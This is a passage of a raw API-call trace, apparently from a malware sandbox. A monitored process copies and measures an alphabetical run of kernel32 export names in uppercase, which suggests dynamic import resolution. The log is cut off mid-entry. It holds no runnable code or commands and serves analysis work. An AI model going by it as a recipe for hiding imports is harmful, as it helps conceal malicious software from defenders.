[0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.084] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.084] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.084] lstrlenA (lpString="ADDATOMA") returned 8 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.084] lstrlenA (lpString="ADDATOMW") returned 8 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.084] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.084] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.084] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.084] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.084] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.084] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.085] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.085] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.085] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.085] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.085] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.085] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.085] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.085] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.085] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.085] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.085] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.085] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.085] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.085] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.085] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.085] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.085] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.085] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.086] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.086] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.086] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.086] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.086] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.086] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.086] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.086] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.086] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.086] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.086] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.086] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.086] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.086] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.086] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.086] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.086] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.086] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.087] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.087] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.087] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.087] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.087] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.087] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.087] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.087] lstrlenA (lpString="BEEP") returned 4 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.087] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.087] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.087] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.087] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.087] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.087] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.087] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.087] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.087] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.087] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.088] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.088] lstrlenA (lpString="CANCELIO") returned 8 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.088] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.088] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.088] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.088] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.088] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.088] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.088] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.088] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.088] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.088] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.088] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.088] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.088] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.088] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.088] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.088] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.088] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.089] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.089] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.089] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.089] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.089] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.089] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.089] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.089] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.089] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.089] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.089] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.089] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.089] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.089] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.090] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.090] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.090] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.090] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.090] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.090] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.090] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.090] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.090] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.090] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.090] lstrlenA (lpString="COPYFILEA") returned 9 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.090] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.090] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.090] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.090] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.090] lstrlenA (lpString="COPYFILEW") returned 9 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.090] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.090] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.090] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.090] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.091] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.091] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.091] lstrlenA 